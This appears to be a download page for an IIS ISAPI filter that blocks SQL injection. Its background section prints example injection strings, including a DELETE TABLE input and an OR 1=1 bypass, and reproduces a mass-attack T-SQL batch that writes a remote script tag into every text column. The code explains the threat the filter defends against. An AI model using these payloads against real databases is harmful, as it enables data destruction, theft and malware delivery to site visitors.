This ISAPI wildcard, which works as a ISAPI filter, sanitizes SQL Injection attacks directly from GET and POST variables.NEW BETA
Version 2.0 is available and it includes a configuration application which enables you to enable log and to exclude files from being filtered. Logging capabilities will enable you to verify the attacks you are suffering.Introduction
This ISAPI dll prevents SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.
This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT support ISAPI Wildcard. Background
SQL Server Injection is a common technique of application attack targeting the database layer of such application. All applications using string concatenation to create SQL queries instead of parameterized queries are by nature vulnerable, no exceptions. See below a basic example: C#:
stringSQL = "SELECT * FROM users WHERE userName = \'" UserId.Text
stringSQL = "SELECT * FROM users WHERE userName = '" & Request("UserId") & "';"
If the UserId is entered as: '; DELETE TABLE xxxx; --
the SQL query sent to the database will be: SELECT * FROM users WHERE userName = ''; DELETE TABLE xxxx; --';
Which will delete table xxxx. Other category of attack is related to privacy. If User Id is entered as ' OR 1=1 --
the resulting SQL query will be: SELECT * FROM users WHERE userName = '' OR 1=1 --';
Forcing the return of all rows from table "users". More sophisticated attack using inline:
… = a few hundred chars that were not included (hex encoded values)
Which translate to the following T-SQL batch:DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor CURSOR FORselect a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@CWHILE(@@FETCH_STATUS=0) BEGINexec(’update ['@T'] set ['@C']=rtrim(convert(varchar,['@C']))+”<script src=http://www.211796*.net/f****}p.js></script>”’)FETCH NEXT FROM Table_Cursor INTO @T,@CENDCLOSE Table_CursorDEALLOCATE Table_Cursor
See more about this kind of attack here: http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attackThis category of attack is also completely blocked by the filter since the very beta versionBy Rodney Vianahttp://www.rodneyviana.comhttp://blogs.msdn.com/rodneyvianaDownload InstallerFirst ReleaseInstallation
A video describing the step-by-step installation is available here: First Release
You can also see written instructions in this Discussion thread: Installation64-bit beta version is released
I need beta testers.